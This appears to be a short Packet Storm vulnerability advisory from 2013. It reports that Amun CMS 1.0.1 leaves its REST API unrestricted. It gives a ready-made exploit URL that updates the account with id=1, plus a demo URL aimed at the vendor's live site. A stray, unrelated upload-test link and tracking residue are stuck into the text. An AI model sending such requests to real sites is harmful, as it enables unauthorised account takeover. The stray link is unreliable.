Amun CMS version 1.0.1 fails to restrict access to its REST API.
8a1edcbf00c3646d6fc6c484cfea43697c0602acb71980da916cbfcb6ea49926Amun CMS 1.0.1 REST API No Access Restriction
Author : syst3m_f4ult
Homepage : http://amun-project.org
Vendor : Amun CMS
Version : 1.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
exploit : http://127.0.0.1/
index.php/api/user/account/form?format=xml&method=update&id=1
Demo :
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1<http://demo-en.automne.ws/automne/fckeditor/editor/filemanager/connectors/uploadtest.html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed